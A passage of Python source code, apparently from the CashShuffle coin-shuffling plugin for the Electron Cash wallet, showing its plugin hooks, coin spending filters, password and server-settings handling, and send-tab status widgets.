# More paranoia -- in case app crashed, unfreeze coins frozen by last
# app run.
CoinUtils.unfreeze_frozen_by_shuffling(wallet)
wallet._shuffle_patched_ = True
print_error("[shuffle] Patched wallet")
patch_wallet(window.wallet)
patch_utxo_list(window.utxo_list)
patch_window(window)
def monkey_patches_remove(window):
def restore_window(window):
if not getattr(window, '_shuffle_patched_', None):
return
if window.network:
window.network.unregister_callback(window._shuffle_network_callback)
delattr(window, '_shuffle_network_callback')
try: window._shuffle_sigs.tx.disconnect()
except TypeError: pass
window._shuffle_sigs.deleteLater()
delattr(window, "_shuffle_sigs")
delattr(window, '_shuffle_tentative')
window.send_tab_shuffle_extra.setParent(None); window.send_tab_shuffle_extra.deleteLater();
delattr(window, 'send_tab_shuffle_extra')
delattr(window, 'background_process')
delattr(window, '_shuffle_patched_')
window.force_use_single_change_addr = None
print_error("[shuffle] Unpatched window")
# Note that at this point an additional monkey patch: 'window.__disabled_sendtab_extra__' may stick around until the plugin is unloaded altogether
def restore_utxo_list(utxo_list):
if not getattr(utxo_list, '_shuffle_patched_', None):
return
header = utxo_list.headerItem()
header_labels = [header.text(i) for i in range(header.columnCount())]
del header_labels[-1]
utxo_list.update_headers(header_labels)
utxo_list.in_progress = None
delattr(window.utxo_list, "in_progress")
delattr(window.utxo_list, '_shuffle_patched_')
print_error("[shuffle] Unpatched utxo_list")
def restore_wallet(wallet):
if not getattr(wallet, '_shuffle_patched_', None):
return
delattr(wallet, '_addresses_cashshuffle_reserved')
delattr(wallet, 'cashshuffle_get_new_change_address')
delattr(wallet, "is_coin_shuffled")
delattr(wallet, "get_shuffled_and_unshuffled_coins")
delattr(wallet, "_is_shuffled_cache")
delattr(wallet, "_shuffled_address_cache")
delattr(wallet, '_shuffle_patched_')
delattr(wallet, "_last_change")
delattr(wallet, "_reshuffles")
CoinUtils.store_shuffle_change_shared_with_others(wallet) # save _shuffle_change_shared_with_others to storage -- note this doesn't call storage.write() for performance reasons.
delattr(wallet, '_shuffle_change_shared_with_others')
CoinUtils.unfreeze_frozen_by_shuffling(wallet)
print_error("[shuffle] Unpatched wallet")
restore_window(window)
restore_utxo_list(window.utxo_list)
restore_wallet(window.wallet)
def _elide(x, maxlen=30, startlen=8):
''' Useful for eliding GUI text with an ellipsis ... in the middle '''
if len(x) > maxlen and startlen + 3 < maxlen:
return x[:startlen] + "..." + x[-(maxlen-startlen-3):]
return x
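# Illustrative example (not from the original source): with the defaults
# maxlen=30 and startlen=8, a long host name is reduced to its first 8
# characters, then "...", then its last 19 characters, so the elided result is
# always exactly maxlen characters; strings that already fit are returned as-is.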
class Plugin(BasePlugin):
instance = None # The extant instance singleton, if any. Variable is cleared on plugin stop.
gui = None # The "gui object" singleton (ElectrumGui) -- a useful refrence to keep around.
network_dialog = None # The NetworkDialog window singleton (managed by the ElectrumGui singleton).
def fullname(self):
return 'CashShuffle'
def description(self):
return _("CashShuffle Protocol")
def is_available(self):
return True
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.windows = []
self.disabled_windows = [] # this is to manage the "cashshuffle disabled" xtra gui element in the send tab
self._hide_history_txs = False
self.initted = False
def is_defunct(self):
return Plugin.instance is not self
@hook
def init_qt(self, gui):
if self.initted:
return
self.print_error("Initializing...")
Plugin.instance = self
Plugin.gui = gui
self._delete_old_keys(gui.config)
if Plugin.network_dialog != gui.nd:
Plugin.network_dialog = gui.nd # each time we are stopped, our module gets re-imported and we lose globals... so try and recapture this singleton
ct = 0
for window in gui.windows:
self.on_new_window(window)
ct += 1
        self.on_network_dialog(Plugin.network_dialog) # If we have a network dialog, add self to network dialog
self.initted = True
self._hide_history_txs = bool(gui.config.get(ConfKeys.Global.HIDE_TXS_FROM_HISTORY, False))
self.print_error("Initialized (had {} extant windows).".format(ct))
self._hide_history_txs_check()
@hook
def on_network_dialog(self, nd):
Plugin.network_dialog = nd
if not nd: return
self.print_error("OnNetworkDialog", str(nd))
if not hasattr(nd, "__shuffle_settings__") or not nd.__shuffle_settings__:
nd.__shuffle_settings__ = st = SettingsTab(parent=nd.nlayout.tabs, config=nd.nlayout.config)
nd.nlayout.tabs.addTab(st, QIcon(':icons/CashShuffleLogos/logo-vertical.svg'), _("CashShuffle"))
st.applyChanges.connect(Plugin.try_to_apply_network_dialog_settings)
elif nd.__shuffle_settings__:
# they may have a fake view if they didn't apply the last settings, refresh the view
st = nd.__shuffle_settings__
st.refreshFromSettings()
@hook
def window_update_status(self, window):
but = getattr(window, '__shuffle__status__button__', None)
if but:
but.update_cashshuffle_icon()
def show_cashshuffle_tab_in_network_dialog(self, window):
window.gui_object.show_network_dialog(window)
nd = Plugin.network_dialog
if nd and getattr(nd, '__shuffle_settings__', None):
st = nd.__shuffle_settings__
nd.nlayout.tabs.setCurrentWidget(st)
nd.activateWindow()
return True
return False
def del_network_dialog_tab(self):
# delete the shuffle settings widget
if Plugin.network_dialog and hasattr(Plugin.network_dialog, '__shuffle_settings__'):
nd = Plugin.network_dialog
st = Plugin.network_dialog.__shuffle_settings__
if st:
idx = nd.nlayout.tabs.indexOf(st)
if idx > -1:
if nd.nlayout.tabs.currentIndex() == idx:
nd.nlayout.tabs.setCurrentIndex(0)
nd.nlayout.tabs.removeTab(idx)
st.kill()
st.setParent(None)
st.deleteLater() # need to call this otherwise it sticks around :/
st = None
Plugin.network_dialog.__shuffle_settings__ = None
self.print_error("Removed CashShuffle network settings tab")
def window_has_cashshuffle(self, window):
return window in self.windows
def window_wants_cashshuffle(self, window):
return window.wallet.storage.get(ConfKeys.PerWallet.ENABLED, False)
def window_set_wants_cashshuffle(self, window, b):
window.wallet.storage.put(ConfKeys.PerWallet.ENABLED, bool(b))
def window_set_cashshuffle(self, window, b):
if not b and self.window_has_cashshuffle(window):
self._disable_for_window(window)
elif b and not self.window_has_cashshuffle(window):
self._enable_for_window(window)
self.window_set_wants_cashshuffle(window, b)
def _window_set_disabled_extra(self, window):
self._window_clear_disabled_extra(window)
window.__disabled_sendtab_extra__ = SendTabExtraDisabled(window)
def _window_clear_disabled_extra(self, window):
extra = getattr(window, "__disabled_sendtab_extra__", None)
if extra:
extra.setParent(None) # python will gc this badboy
delattr(window, "__disabled_sendtab_extra__")
del extra # hopefully object refct goes immediately to 0 and this widget dies quickly.
return True
@classmethod
def is_wallet_cashshuffle_compatible(cls, window):
from electroncash.wallet import ImportedWalletBase, Multisig_Wallet
if (window.wallet.is_watching_only()
or window.wallet.is_hardware()
or isinstance(window.wallet, (Multisig_Wallet, ImportedWalletBase))):
# wallet is watching-only, multisig, or hardware so.. not compatible
return False
return True
def add_button_to_window(self, window):
if not hasattr(window, '__shuffle__status__button__'):
from .qt_status_bar_mgr import ShuffleStatusBarButtonMgr
window.__shuffle__status__button__ = ShuffleStatusBarButtonMgr(self, window)
window.print_error("Added cashshuffle status button")
@classmethod
def remove_button_from_window(cls, window):
if hasattr(window, '__shuffle__status__button__'):
window.__shuffle__status__button__.remove()
delattr(window, '__shuffle__status__button__')
window.print_error("Removed cashshuffle status button")
@hook
def on_new_window(self, window):
if not self.is_wallet_cashshuffle_compatible(window):
# wallet is watching-only, multisig, or hardware so.. mark it permanently for no cashshuffle
self.window_set_cashshuffle(window, False)
window.update_status() # this has the side-effect of refreshing the cash shuffle status bar button's context menu (which has actions even for disabled/incompatible windows)
return
self.add_button_to_window(window) # unconditionally add the button if compatible -- they may want to enable it later
if window.wallet and not self.window_has_cashshuffle(window):
if self.window_wants_cashshuffle(window):
self._enable_for_window(window) or self._window_add_to_disabled(window)
else:
self._window_add_to_disabled(window)
def _enable_for_window(self, window):
name = window.wallet.basename()
self.print_error("Window '{}' registered, performing window-specific startup code".format(name))
if window.gui_object.warn_if_no_secp(
parent=window,
message=_("CashShuffle requires libsecp; cannot enable shuffling for this wallet."),
icon=QMessageBox.Critical):
self.print_error("Refusing to enable CashShuffle for window '{}' because no libsecp :(".format(name))
return
if self.is_defunct(): return # we need to do this because presentation of above dialog box may mean user had the opportunity to close the plugin in another window
cached_password = window.gui_object.get_cached_password(window.wallet)
password = None
while window.wallet.has_password():
msg = _("CashShuffle requires access to '{}'.").format(name) + "\n" + _('Please enter your password')
if cached_password:
password = cached_password
cached_password = None
else:
pwdlg = PasswordDialog(parent=window.top_level_window(), msg=msg)
password = pwdlg.run()
if self.is_defunct(): return # we need to do this because presentation of above dialog box may mean user had the opportunity to close the plugin in another window
if password is None:
# User cancelled password input
if not self.warn_if_shuffle_disable_not_ok(window, msg=_('CashShuffle will now be <i>disabled</i> for a wallet which has previously had it <b>enabled</b>. Are you sure?')):
# User was warned and opted to try again to enable
continue
self.window_set_cashshuffle(window, False)
window.show_error(_("CashShuffle password prompt canceled; disabling for this wallet."), parent=window)
return
try:
window.wallet.check_password(password)
break
except Exception as e:
window.show_error(str(e), parent=window)
if self.is_defunct(): return # we need to do this because presentation of above dialog box may mean user had the opportunity to close the plugin in another window
continue
network_settings = Plugin.get_network_settings(window.config)
if not network_settings:
network_settings = self.settings_dialog(window, msg=_("Please choose a CashShuffle server"), restart_ask = False)
if self.is_defunct(): return # we need to do this because presentation of above dialog box may mean user had the opportunity to close the plugin in another window
if not network_settings:
self.window_set_cashshuffle(window, False)
window.show_error(_("Can't get network, disabling CashShuffle."), parent=window)
return
self._delete_old_keys(window.wallet)
self._window_remove_from_disabled(window)
network_settings = copy.deepcopy(network_settings)
network_settings['host'] = network_settings.pop('server')
monkey_patches_apply(window)
self.windows.append(window)
self._increment_session_counter(window)
window.update_status()
window.utxo_list.update()
start_background_shuffling(window, network_settings, password=password)
return True
@hook
def utxo_list_item_setup(self, utxo_list, item, x, name):
my_custom_item_setup(utxo_list, item, x, name)
@hook
def utxo_list_context_menu_setup(self, utxo_list, menu, selected):
window = utxo_list.parent
if window in self.windows:
my_custom_utxo_context_menu_setup(window, utxo_list, menu, selected)
@hook
def history_list_filter(self, history_list, h_item, label):
# NB: 'h_item' might be None due to performance reasons
if self._hide_history_txs:
return bool(label.startswith("Shuffle ") # this string is not translated for performance reasons. _make_label also does not translate this string.
and ( any( x for x in BackgroundShufflingThread.SCALE_ARROWS
if x in label )
or BackgroundShufflingThread.SCALE_ARROW_UNKNOWN in label
)
)
return None
@hook
def history_list_context_menu_setup(self, history_list, menu, item, tx_hash):
# NB: We unconditionally create this menu if the plugin is loaded because
# it's possible for any wallet, even a watching-only wallet to have
# shuffle tx's with the correct labels (if the user uses labelsync or
# has imported labels).
menu.addSeparator()
def action_callback():
self._hide_history_txs = not self._hide_history_txs
Plugin.gui.config.set_key(ConfKeys.Global.HIDE_TXS_FROM_HISTORY, self._hide_history_txs, save=True)
action.setChecked(self._hide_history_txs)
if self._hide_history_txs:
tip = _("Shuffle transactions are now hidden")
else:
tip = _("Shuffle transactions are now shown")
QToolTip.showText(QCursor.pos(), tip, history_list)
history_list.update() # unconditionally update this history list as it may be embedded in the address_detail window and not a global history list..
for w in Plugin.gui.windows:
# Need to update all the other open windows.
# Note: We still miss any other open windows' address-detail
# history lists with this.. but that's ok as most of the
# time it won't be noticed by people and actually
# finding all those windows would just make this code
# less maintainable.
if history_list is not w.history_list: # check if not already updated above
w.history_list.update()
action = menu.addAction(_("Hide shuffle transactions"), action_callback)
action.setCheckable(True)
action.setChecked(self._hide_history_txs)
def on_close(self):
''' This is called on plugin unload/disable '''
self.del_network_dialog_tab()
PoolsWinMgr.killInstance()
for window in self.windows.copy():
self.on_close_window(window)
for window in self.disabled_windows.copy():
self.on_close_window(window)
for window in self.gui.windows:
# lastly, we do this for ALL the extant wallet windows because all
# of their CashShuffle context menus attached to the cashshuffle
# status button need updating when the plugin is exited. Note
# that there may be windows in this set (incompatible windows)
# that aren't in either of the above 2 sets of windows.
window.update_status()
self.initted = False
Plugin.instance = None
self.print_error("Plugin closed")
assert len(self.windows) == 0 and len(self.disabled_windows) == 0, (self.windows, self.disabled_windows)
self._hide_history_txs_check()
def _hide_history_txs_check(self):
        # Handle the possibility that, now that the plugin has been closed or opened, shuffle tx's need to be hidden or unhidden; refresh the history lists accordingly.
if self._hide_history_txs and Plugin.gui:
def refresh_history_lists(gui):
for w in gui.windows:
w.history_list.update()
QTimer.singleShot(250, lambda: refresh_history_lists(Plugin.gui))
@hook
def on_close_window(self, window):
def didRemove(window):
self.print_error("Window '{}' removed".format(window.wallet.basename()))
self.remove_button_from_window(window)
if self._window_remove_from_disabled(window):
didRemove(window)
return
if self._disable_for_window(window, add_to_disabled = False):
didRemove(window)
return
def _disable_for_window(self, window, add_to_disabled = True):
if window not in self.windows:
return
name = window.wallet.basename()
if window.background_process:
self.print_error("Joining background_process...")
window.background_process.join()
window.background_process.logger.disconnectAll(); window.background_process.logger.deleteLater()
window.background_process = None
self.print_error("Window '{}' closed, ended shuffling for its wallet".format(name))
self.windows.remove(window)
monkey_patches_remove(window)
window.utxo_list.update()
window.update_status()
self.print_error("Window '{}' disabled".format(name))
if add_to_disabled:
self._window_add_to_disabled(window)
else:
self._window_remove_from_disabled(window)
return True
def _window_add_to_disabled(self, window):
if window not in self.disabled_windows:
self._window_set_disabled_extra(window)
self.disabled_windows.append(window)
window.update_status() # ensure cashshuffle icon has the right menus, etc
return True
def _window_remove_from_disabled(self, window):
self._window_clear_disabled_extra(window)
if window in self.disabled_windows:
self.disabled_windows.remove(window)
return True
@hook
def on_new_password(self, window, old, new):
if getattr(window, 'background_process', None):
self.print_error("Got new password for wallet {} informing background process...".format(window.wallet.basename() if window.wallet else 'UNKNOWN'))
window.background_process.set_password(new)
@hook
def on_spend_coins(self, window, coins):
if (not coins or window not in self.windows
# the coin may not be "mine" if doing private key -> sweep
# in that case, just abort this as it doesn't matter what
# mode the send tab is in
or (window.tx_external_keypairs
and not window.wallet.is_mine(coins[0]['address']))):
return
extra = window.send_tab_shuffle_extra
spend_mode = extra.spendingMode()
is_shuffled = CoinUtils.is_coin_shuffled(window.wallet, coins[0]) # check coins[0]
if spend_mode == extra.SpendingModeShuffled and not is_shuffled:
# Coin is not shuffled, spend mode is Shuffled, force send tab to
# coin's mode
extra.setSpendingMode(extra.SpendingModeUnshuffled)
elif spend_mode == extra.SpendingModeUnshuffled and is_shuffled:
# Coin is shuffled, spend mode is UnShuffled, force send tab to
# coin's mode
extra.setSpendingMode(extra.SpendingModeShuffled)
@hook
def spendable_coin_filter(self, window, coins):
if not coins or window not in self.windows:
return
extra = window.send_tab_shuffle_extra
spend_mode = extra.spendingMode()
        external_coin_addresses = set() # this is only ever used if they are doing a sweep, in which case we always allow the coins involved in the sweep
for pubkey in window.tx_external_keypairs:
a = Address.from_pubkey(pubkey)
external_coin_addresses.add(a)
if spend_mode == extra.SpendingModeShuffled:
# in Cash-Shuffle mode + shuffled spending we can ONLY spend shuffled coins + unshuffled living on a shuffled coin address
shuf_adrs_seen = set()
shuf_coins_seen = set()
for coin in coins.copy():
if coin['address'] in external_coin_addresses:
# completely bypass this filter for external keypair dict
# which is only used for sweep dialog in send tab
continue
is_shuf_adr = CoinUtils.is_shuffled_address(window.wallet, coin['address'])
if is_shuf_adr:
shuf_adrs_seen.add(coin['address'])
if (not CoinUtils.is_coin_shuffled(window.wallet, coin)
and not is_shuf_adr): # we allow coins sitting on a shuffled address to be "spent as shuffled"
coins.remove(coin)
else:
shuf_coins_seen.add(CoinUtils.get_name(coin))
# NEW! Force co-spending of other coins sitting on a shuffled address (Fix #3)
for adr in shuf_adrs_seen:
adr_coins = window.wallet.get_addr_utxo(adr)
for name, adr_coin in adr_coins.items():
if name not in shuf_coins_seen and not adr_coin['is_frozen_coin']:
coins.append(adr_coin)
shuf_coins_seen.add(name)
elif spend_mode == extra.SpendingModeUnshuffled:
# in Cash-Shuffle mode + unshuffled spending we can ONLY spend unshuffled coins (not sitting on a shuffled address)
for coin in coins.copy():
if ((CoinUtils.is_coin_shuffled(window.wallet, coin)
or is_coin_busy_shuffling(window, coin)
or CoinUtils.is_shuffled_address(window.wallet, coin['address']))
and coin['address'] not in external_coin_addresses):
coins.remove(coin)
@hook
def balance_label_extra(self, window):
if window not in self.windows:
return
shuf, unshuf, uprog, usas = CoinUtils.get_shuffled_and_unshuffled_coin_totals(window.wallet)
totShuf, nShuf = shuf
# TODO: handle usas separately?
totShuf += usas[0]
nShuf += usas[1]
window.send_tab_shuffle_extra.refresh(shuf, unshuf, uprog, usas)
if nShuf:
return (_('Shuffled: {} {} in {} Coin'),
_('Shuffled: {} {} in {} Coins'))[0 if nShuf == 1 else 1].format(window.format_amount(totShuf).strip(), window.base_unit(), nShuf)
return None
@hook
def not_enough_funds_extra(self, window):
if window not in self.windows:
return
shuf, unshuf, uprog, usas = CoinUtils.get_shuffled_and_unshuffled_coin_totals(window.wallet)
totShuf, nShuf, totUnshuf, nUnshuf, totInProg, nInProg = *shuf, *unshuf, *uprog
# TODO: handle usas separately?
totShuf += usas[0]
nShuf += usas[1]
extra = window.send_tab_shuffle_extra
        extra.refresh(shuf, unshuf, uprog, usas)
spend_mode = extra.spendingMode()
rets = []
if spend_mode == extra.SpendingModeShuffled:
if totUnshuf:
rets += [_("{} {} are unshuffled").format(window.format_amount(totUnshuf).strip(), window.base_unit())]
elif spend_mode == extra.SpendingModeUnshuffled:
if totShuf:
rets += [_("{} {} are shuffled").format(window.format_amount(totShuf).strip(), window.base_unit())]
if totInProg:
rets += [_("{} {} are busy shuffling").format(window.format_amount(totInProg).strip(), window.base_unit())]
return ') ('.join(rets) or None
@hook
def get_change_addrs(self, wallet):
for window in self.windows:
if wallet == window.wallet:
change_addrs = [wallet.cashshuffle_get_new_change_address()]
wallet.print_error("CashShuffle: reserving change address",change_addrs[0].to_ui_string())
return change_addrs
@hook
def do_clear(self, w):
for window in self.windows:
if w is window:
extra = getattr(w, 'send_tab_shuffle_extra', None)
if extra:
extra.do_clear()
return
def restart_all(self):
for window in self.windows:
bp = window.background_process
if bp:
password = bp.get_password()
network_settings = Plugin.get_network_settings(window.config)
if network_settings:
bp.join()
# kill the extant console logger as its existence can cause subtle bugs
bp.logger.disconnectAll(); bp.logger.deleteLater(); bp.logger = None
network_settings['host'] = network_settings.pop('server')
window.background_process = None; del bp
start_background_shuffling(window, network_settings, password=password)
window.print_error("CashShuffle restarted for wallet")
nd = Plugin.network_dialog
# force network settings tab to also refresh itself on restart to keep it in synch with other possible settings dialogs
if nd:
st = getattr(nd, "__shuffle_settings__", None)
if st: st.refreshFromSettings()
else:
window.print_error("ERROR: could not load network settings, FIXME!")
else:
window.print_error("WARNING: Window lacks a background_process, FIXME!")
def view_pools(self, window):
assert isinstance(window, ElectrumWindow), "view_pools must be passed an ElectrumWindow object! FIXME!"
settings = __class__.get_and_validate_network_settings(window.config)
if settings:
sdict = settings.copy()
sdict['name'] = "{}:{}".format(sdict['server'], sdict['info'])
PoolsWinMgr.show(sdict, settings, window.config, parent_window=window, modal=False)
else:
# this should not normally be reachable in the UI, hence why we don't i18n the error string.
window.show_error("CashShuffle is not properly set up -- no server defined! Please select a server from the settings.")
def restart_cashshuffle(self, window, msg = None, parent = None):
if (parent or window).question("{}{}".format(msg + "\n\n" if msg else "", _("Restart the CashShuffle plugin now?")),
app_modal=True):
self.restart_all()
window.notify(_("CashShuffle restarted"))
def settings_dialog(self, window, msg=None, restart_ask = True):
def window_parent(w):
# this is needed because WindowModalDialog overrides window.parent
if callable(w.parent): return w.parent()
return w.parent
while not isinstance(window, ElectrumWindow) and window and window_parent(window):
# MacOS fixups -- we can get into a situation where we are created without the ElectrumWindow being an immediate parent or grandparent
window = window_parent(window)
assert window and isinstance(window, ElectrumWindow)
d = SettingsDialog(title=_("CashShuffle Settings"), config=window.config, message=msg)
try:
server_ok = False
ns = None
while not server_ok:
if not d.exec_():
return
else:
ns = d.get_form()
server_ok = d.serverOk
if not server_ok:
server_ok = Plugin.show_bad_server_box()
if ns:
Plugin.save_network_settings(window.config, ns)
if restart_ask:
self.restart_cashshuffle(window, msg = _("CashShuffle must be restarted for the server change to take effect."))
return ns
finally:
d.deleteLater()
del d
@staticmethod
def show_bad_server_box():
return bool(QMessageBox.critical(None, _("Error"), _("Unable to connect to the specified server."), QMessageBox.Retry|QMessageBox.Ignore, QMessageBox.Retry) == QMessageBox.Ignore)
@staticmethod
def try_to_apply_network_dialog_settings(settings_tab):
ns = settings_tab.get_form()
if ns and (settings_tab.serverOk or Plugin.show_bad_server_box()):
Plugin.save_network_settings(settings_tab.config, ns) # save settings first.
gui = Plugin.gui
instance = Plugin.instance
window = None
# Next, try and get a wallet window to query user for plugin restart. If no window found, that's ok. Restart won't be necessary. :)
if instance and instance.windows:
# first try and get a window that actually has cashshuffle running, as that's only polite
window = instance.windows[-1]
elif instance and instance.disabled_windows:
# ok, no enabled windows -- next, get a window that is cashshuffle compatible, if any exist
window = instance.disabled_windows[-1]
elif gui and gui.windows:
# If that fails, get any old window...
window = gui.windows[-1]
# NB: if no window at this point, settings will take effect next time CashShuffle is enabled for a window
if window and instance:
# window will raise itself.
instance.restart_cashshuffle(window,
msg = _("CashShuffle must be restarted for the server change to take effect."),
parent = Plugin.network_dialog)
@staticmethod
def save_network_settings(config, network_settings):
ns = copy.deepcopy(network_settings)
print_error("Saving network settings: {}".format(ns))
config.set_key(ConfKeys.Global.SERVER, ns)
@staticmethod
def get_network_settings(config):
return copy.deepcopy(config.get(ConfKeys.Global.SERVER, None))
@staticmethod
def get_and_validate_network_settings(config):
selected = dict()
try:
# try and pre-populate from config
current = __class__.get_network_settings(config)
dummy = (current["server"], current["info"], current["ssl"]); del dummy;
selected = current
except (KeyError, TypeError):
pass
return selected
def settings_widget(self, window):
weakMeth = Weak(self.settings_dialog)
weakWindow = Weak(window)
return EnterButton(_('Settings'), lambda: weakMeth(weakWindow))
def requires_settings(self):
return True
def _delete_old_keys(self, config_or_wallet):
getter, setter, defuncts, thing = None, None, tuple(), None
if isinstance(config_or_wallet, SimpleConfig):
config = config_or_wallet
getter = lambda k: config.get(k)
setter = lambda k: config.set_key(k, None, save=True)
defuncts = ConfKeys.Global.DEFUNCT
thing = "config"
elif isinstance(config_or_wallet, Abstract_Wallet):
storage = config_or_wallet.storage
getter = lambda k: storage.get(k)
setter = lambda k: storage.put(k, None)
defuncts = ConfKeys.PerWallet.DEFUNCT
thing = "wallet.storage for {}".format(config_or_wallet.basename())
if thing:
ct = 0
for k in defuncts:
if getter(k) is not None:
ct += 1
setter(k)
if ct:
self.print_error("Found and removed {} deprecated keys from {}".format(ct, thing))
# counters: shuffle counter and session counter
@classmethod
def _increment_generic_counter(cls, window, key):
window.wallet.storage.put(key, cls._get_generic_counter(window, key) + 1)
@staticmethod
def _get_generic_counter(window, key):
try:
ctr = int(window.wallet.storage.get(key, 0))
except (ValueError, TypeError): # paranoia
# stored value must have not been an int. :(
ctr = 0
return ctr
@classmethod
def _increment_session_counter(cls, window):
cls._increment_generic_counter(window, ConfKeys.PerWallet.SESSION_COUNTER)
@classmethod
def _get_session_counter(cls, window):
return cls._get_generic_counter(window, ConfKeys.PerWallet.SESSION_COUNTER)
@classmethod
def _increment_shuffle_counter(cls, window):
cls._increment_generic_counter(window, ConfKeys.PerWallet.SHUFFLE_COUNTER)
@classmethod
def _get_shuffle_counter(cls, window):
return cls._get_generic_counter(window, ConfKeys.PerWallet.SHUFFLE_COUNTER)
# /counters
def warn_if_shuffle_disable_not_ok(self, window, *, msg=None):
'''
Determine if disabling (or not re-enabling in the case of a pw dialog
cancel) of cash shuffle is ok for this wallet.
This method may block the GUI with a local modal dialog asking the user
if they are sure.
In the future, we may also put code to say "shuffles pending, please
wait..." in a cancellable progress-type dialog.
Returns True if calling code should proceed with disable action.
'''
# Note -- window may not necessarily be shuffle patched as this
# may be called from the password dialog
noprompt = window.wallet.storage.get(ConfKeys.PerWallet.DISABLE_NAGGER_NOPROMPT, False)
if not noprompt and type(self)._get_session_counter(window) > 0:
if msg is None:
msg = _('You are now <i>disabling</i> CashShuffle for this wallet. Are you sure?')
ans, chk = window.question(
msg=msg,
informative_text=_('Spending and linking coins with CashShuffle disabled may compromise your privacy for both shuffled and unshuffled coins in this wallet.'),
title=_("Privacy Warning"), rich_text=True,
checkbox_text=_("Never ask for this wallet"), checkbox_ischecked=noprompt,
)
if chk:
window.wallet.storage.put(ConfKeys.PerWallet.DISABLE_NAGGER_NOPROMPT, bool(chk))
return bool(ans)
return True
class SendTabExtraDisabled(QFrame, PrintError):
''' Implements a Widget that appears in the main_window 'send tab' to inform the user CashShuffle was disabled for this wallet '''
def __init__(self, window):
self.send_tab = window.send_tab
self.send_grid = window.send_grid
self.wallet = window.wallet
self.window = window
super().__init__(window.send_tab)
self.send_grid.addWidget(self, 0, 0, 1, self.send_grid.columnCount()) # just our luck. row 0 is free!
self.setup()
def setup(self):
self.setFrameStyle(QFrame.StyledPanel|QFrame.Sunken)
l = QGridLayout(self)
l.setVerticalSpacing(6)
l.setHorizontalSpacing(30)
l.setContentsMargins(6, 6, 6, 6)
self.txt = "<big><b>{}</b></big> {}".format(_("CashShuffle Disabled"), _("Your shuffled and unshuffled coins can be mixed and spent together."))
self.msg = "{}\n\n{}\n\n{}".format(_("When CashShuffle is disabled, your privacy on the blockchain is reduced to traditional levels, and 'chainalysis' becomes easier (your transactions can be associated with one another)."),
_("This spending mode is the same as previous versions of Electron Cash, which did not offer CashShuffle."),
_("You may toggle CashShuffle back on at any time using the 'CashShuffle' icon in the status bar."))
self.titleLabel = HelpLabel(self.txt, self.msg)
self.titleLabel.setParent(self)
l.addWidget(self.titleLabel, 0, 1, 1, 4)
l.setAlignment(self.titleLabel, Qt.AlignLeft|Qt.AlignVCenter)
l.addItem(QSpacerItem(1, 1, QSizePolicy.MinimumExpanding, QSizePolicy.Fixed), 1, 5)
icon = FixedAspectRatioSvgWidget(75, ":icons/CashShuffleLogos/logo-vertical_grayed.svg")
icon.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
icon.setToolTip(_("CashShuffle Disabled"))
l.addWidget(icon, 0, 0, l.rowCount(), 1)
l.setSizeConstraint(QLayout.SetNoConstraint)
class SendTabExtra(QFrame, PrintError):
''' Implements a Widget that appears in the main_window 'send tab' to inform the user of shuffled coin status & totals '''
needRefreshSignal = pyqtSignal() # protocol thread uses this signal to tell us that amounts have changed
needWalletSaveSignal = pyqtSignal() # protocol thread uses this signal to tell us that the wallet should be saved to disk using storage.write
pixmap_cached = None # singleton gets initialized first time an instance of this class is constructed. Contains the cashshuffle_icon5.png scaled to 125px width
def __init__(self, window):
self.send_tab = window.send_tab
self.send_grid = window.send_grid
self.wallet = window.wallet
self.window = window
super().__init__(window.send_tab)
self.send_grid.addWidget(self, 0, 0, 1, self.send_grid.columnCount()) # just our luck. row 0 is free!
self.setup()
def setup(self):
self.setFrameStyle(QFrame.StyledPanel|QFrame.Sunken)
l = QGridLayout(self)
l.setVerticalSpacing(6)
l.setHorizontalSpacing(30)
l.setContentsMargins(6, 12, 6, 12)
self.msg = "{}\n\n{}\n\n{}".format(_("For improved privacy, shuffled coins and unshuffled coins cannot be sent together in the same transaction when CashShuffle is enabled."),
_("You may switch between shuffled and unshuffled spending using the radio buttons on the right."),
_("If insufficient shuffled funds are available, you can wait a few minutes as coins are shuffled in the background."))
self.msg2 = "{}\n\n{}\n\n{}".format(_("For improved privacy, shuffled coins and unshuffled coins cannot be sent together in the same transaction when CashShuffle is enabled."),
_("You may switch between shuffled and unshuffled spending using the radio buttons on the right."),
_("Some of your unshuffled funds may be temporarily locked while the shuffle operation is performed. If you want to unlock these funds immediately, you can use the 'Pause Shuffling' button to do so."))
self.titleLabel = HelpLabel("", "") # Will be initialized by self.onSpendRadio() below
self.titleLabel.setParent(self)
l.addWidget(self.titleLabel, 0, 1, 1, 4)
self.spendButtons = QButtonGroup(self)
# Shuffled
self.shufLabel = HelpLabel(_("Shuffled available:"), self.msg)
m = _("Shuffled (private) funds")
self.shufLabel.setToolTip(m)
self.shufLabel.setParent(self)
l.addWidget(self.shufLabel, 1, 1)
self.amountLabel = QLabel("", self); self.amountLabel.setToolTip(m)
l.addWidget(self.amountLabel, 1, 2)
self.numCoinsLabel = QLabel("", self); self.numCoinsLabel.setToolTip(m)
l.addWidget(self.numCoinsLabel, 1, 3)
self.spendShuffled = QRadioButton(_("Spend Shuffled"), self); self.spendShuffled.setToolTip(_("Spend only your shuffled (private) coins"))
l.addWidget(self.spendShuffled, 1, 4)
self.spendButtons.addButton(self.spendShuffled)
# Unshuffled
self.unshufLabel = HelpLabel(_("Unshuffled available:"), self.msg2)
m = _("Funds that are not yet shuffled")
self.unshufLabel.setToolTip(m)
self.unshufLabel.setParent(self)
l.addWidget(self.unshufLabel, 2, 1)
self.amountLabelUnshuf = QLabel("", self); self.amountLabelUnshuf.setToolTip(m)
l.addWidget(self.amountLabelUnshuf, 2, 2)
self.numCoinsLabelUnshuf = QLabel("", self); self.numCoinsLabelUnshuf.setToolTip(m)
l.addWidget(self.numCoinsLabelUnshuf, 2, 3)
self.spendUnshuffled = QRadioButton(_("Spend Unshuffled"), self); self.spendUnshuffled.setToolTip(_("Spend only your unshuffled coins"))
l.addWidget(self.spendUnshuffled, 2, 4)
self.spendButtons.addButton(self.spendUnshuffled)
self.spendShuffled.setChecked(True)
# In Progress
self.msg3 = _("Funds that are busy being shuffled are not available for spending until they are shuffled. To spend these funds immediately, use the 'Pause Shuffling' button to temporarily suspend CashShuffle.")
self.busyLbl = HelpLabel(_("Busy shuffling:"), self.msg3)
self.busyLbl.setParent(self)
m = _("Funds currently being shuffled")
self.busyLbl.setToolTip(m)
l.addWidget(self.busyLbl, 3, 1)
self.amountLabelBusy = QLabel("", self); self.amountLabelBusy.setToolTip(m)
l.addWidget(self.amountLabelBusy, 3, 2)
self.numCoinsLabelBusy = QLabel("", self); self.numCoinsLabelBusy.setToolTip(m)
